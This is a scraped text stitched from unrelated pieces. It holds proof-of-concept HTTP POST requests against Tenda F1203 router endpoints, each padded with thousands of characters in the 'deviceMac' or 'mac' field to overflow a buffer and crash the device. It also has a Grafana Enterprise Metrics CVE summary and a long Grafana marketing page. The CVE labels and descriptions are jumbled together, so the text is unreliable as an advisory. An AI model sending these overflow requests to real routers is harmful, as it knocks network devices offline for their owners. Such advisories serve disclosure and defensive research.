    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4111
    
    deviceMac=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-46532: CVE-vulns/addWifiMacFilter_deviceMac.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the mac parameter at /goform/GetParentControlInfo.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/GetParentControlInfo request.

This vulnerability lies in the /goform/GetParentControlInfo page，The details are shown below:

This POC can result in a Dos.

    POST /goform/GetParentControlInfo HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 2055
    
    mac=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-46530: CVE-vulns/GetParentControlInfo.md at main · Double-q1015/CVE-vulns

In Grafana Enterprise Metrics (GEM) before 1.7.1 and 2.x before 2.3.1, after creating an Access Policy that is granted access to all tenants as well as specified a specific label matcher, the label matcher is erroneously not propagated to queries performed with this access policy. Thus, more access is granted to the policy than intended.

**Grafana Enterprise Metrics**

Introducing a scalable, self-hosted Prometheus service that is seamless to use, simple to operate/maintain, and supported by Grafana Labs.

Offer Prometheus-as-a-Service on-premise for your teams today.

**Traditional approach**

DIY style of scaling Prometheus is complex and requires a lot of effort to maintain throughout different teams.

Scale is limited to a single machine

Lacks data governance, resulting in all-or-nothing access to metrics

Requires a lot of effort to deploy and maintain

**Grafana Enterprise Metrics Approach**

Enables Prometheus-as-a-Service for large organizations running at scale.

Centralized, horizontally scalable, replicated architecture

Centralized access control and authentication

Simple to deploy and maintain your complete set of metrics in one centralized, cost-effective way

**Architected for scale**

Grafana Enterprise Metrics provides a centralized, horizontally scalable, replicated architecture so you can easily manage and maintain your Prometheus implementation based on your specific architecture.

Easily store application and infrastructure metrics in one centralized cluster, or across multiple clusters without needing a dedicated team.

**Operations made simple**

**Simple to get started**

Grafana Enterprise Metrics gives organizations a fully assembled and configured monitoring stack out of the box so there’s no need to build systems from open source components

**Simple to manage**

Easily create and manage tenants and set up authentication for them with an intuitive API-driven UI.

**Simple to customize**

Best-in-class query performance means you can quickly create real-time dashboards that can be shared throughout your organization.

**Global insights for the whole team**

Run a better service with built-in global insights into how your teams use Grafana Enterprise Metrics.

**Quickly fix problems like cardinality explosions or query errors**

Is there a cardinality explosion?

Where are query errors occurring?

**Control costs by weeding out series that are never used or inefficiently used**

Which series are most popular, and which ones are never used?

How much storage space does each series and source consume?

What’s the ingestion and query rate of each series?

**Find out who’s doing what, for security, chargebacks, and better service**

Where is data coming from?

Which users are querying which data?

**Integrates with your tooling**

**Grafana Enterprise**

Integrate with Grafana Enterprise to provide an easy-to-use UI to manage Grafana Enterprise Metrics clusters and tenants.

**Prometheus**

Integrates with your existing Prometheus ecosystem so there’s no need to manually edit and manage configuration files. View and edit your Prometheus-style alerting rules all in one place.

**Graphite**

Integrates with Graphite-based data ingestion and querying, so you can either modernize your existing Graphite systems or transition to Prometheus. Let your team choose the Graphite query language or PromQL.

**Next-level security**

Enterprise-grade access control allows you to go beyond coarse-level read and write permissions to permissions based on Prometheus label value or tenant ID.

Enterprise-grade access control allows you to go beyond read and write permissions with fine-grained access control within and across instances.

Robust data-access policies enable administrators to secure and govern data.

Centralized authentication allows you to seamlessly integrate with a current authentication provider.

**Support**

With Grafana Enterprise Metrics, your team gets support, training, and consulting provided by the Grafana Labs team, including maintainers of Prometheus and Grafana Mimir. We’ll help with anything your organization needs to implement Prometheus and Grafana Enterprise Metrics.

**Features**

**Prometheus**

A systems and service monitoring system with flexible queries and real-time alerting

Prometheus on Github →

**Grafana Enterprise Metrics**

Prometheus with enterprise-grade scalability, durability, administration, integrations, security, and support

Contact us →

****Runs on-premise****

Deploy in your own data center or cloud capacity.

****PromQL****

A powerful language for querying and representing data.

****Efficient storage of time series****

Time series data stored in an efficient custom format.

****Alertmanager****

Precise alerting rules, rule evaluation, and many integrated outputs.

****Long-term storage****

Durable storage of Prometheus and Graphite metrics.

****High availability****

Replication ensures there are no gaps in metric data when a machine fails.

****Horizontal scalability****

Automatically and seamlessly shard data among replicas, so you can grow and shrink the cluster on demand. Scale to hundreds of millions of active metrics series at millions of data points per second.

****A global view of metrics****

Perform queries that aggregate metrics across multiple Prometheus instances and long-term storage.

****Multi-tenancy****

Isolate data and queries from independent teams or business units in a single cluster.

****Governance****

Set per-tenant limits on querying and metrics written to ensure fair usage of the cluster.

****Centralized authentication****

Create keys to authenticate all reads and writes to your cluster, or use JWTs from your existing OAuth OpenID Connect implementation.

****Label-based access controls****

Create policies that restrict users to a subset of team or business unit metrics based on label values.

****Out-of-the-box self-monitoring****

Ships with system-health metrics readily available and exposed via automatically provisioned dashboards that reflect best-practice monitoring.

****Cross-cluster query federation****

Merge query results from metric clusters running in different data centers or geographies to create a global view of your data.

****Administration UI****

Use a UI built into Grafana to edit access policies, tenant limits, and configuration options and monitor GEM system health.

****Indemnification****

Protection and peace of mind about offering Grafana Enterprise Metrics as a critical service within your organization.

****Customer support****

Includes services like training and consulting as well as bug fixes and security updates.

****Integrated experience****

Integration with Grafana Enterprise, Prometheus, Graphite, Loki, and Tempo.

****Usage insights****

Quickly answer how the system is being utilized at a per-team/per-business unit granularity.

Get the information needed for usage-based billing to internal customers.

Coming soon.

**Resources**

Demo video: Running Prometheus-as-a-service with Grafana Enterprise Metrics

**Learn more →**

Blog: What’s new in Grafana Enterprise Metrics for scaling Prometheus

**Learn more →**

**Try Grafana Enterprise Metrics**

Offer your teams a scalable Prometheus service that is seamless to use, simple to maintain, and supported by Grafana Labs.

Contact us

Tag

#mac